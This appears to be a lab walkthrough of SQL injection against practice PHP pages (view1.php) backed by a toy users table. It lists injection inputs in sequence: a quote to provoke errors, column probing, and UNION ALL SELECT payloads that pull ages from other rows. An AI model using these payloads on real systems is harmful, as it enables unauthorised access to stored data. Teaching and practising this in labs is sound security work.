list.php

1. Try it.
   • View source
   • it calls view1.php?id=1 or id=2, so we know the id's and the table called users.
   • We know that Mickey Mouse's id is 1.

view1.php

1. Try view1.php?id=3
   • No display
2. Try view1.php?id=3'
   • You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 1' at line 1 in SELECT * FROM users WHERE id=3' LIMIT 1
   • So we now the table name and the form of the SQL.
   • The LIMIT 1 is going to be a problem if we want to see everything.
3. Try view1.php?id=1 AND XXX IS NULL
   • Unknown column 'XXX' in 'where clause' in SELECT * FROM users WHERE id=1 and barf IS NULL LIMIT 1
4. Try view1.php?id=1 AND age IS NULL
   • age must be a field
5. There's a name, probably first and last. Try some other things.
   • Maybe we find first_name and last_name, maybe not.
6. Can we determine the number of columns; try id=1 union all select 1
   • Get an error, so there's more than one column; by trial and error, we find there are 4 columns.
7. Try: id=1 union all select 1,2,3,4 from users;
   • First name is column 2, last name is column 3, id and age are 1 and 4.
8. Try: id=1 union all select age,age,age,age from users;
   • We get Mickey Mouse as before
9. Try: id=99 union all select age,age,age,age from users;
   • We get 81,81. That's probably the age of the first user.
10. Try: Try: id=99 union all select age,age,age,age from users where id=1; --
    • Get 81,81
11. Try: Try: id=99 union all select age,age,age,age from users where id=2; --
    • Get the age of the user with id=2
    • Or try with first_name
12. Mickey is 81

Now try the other views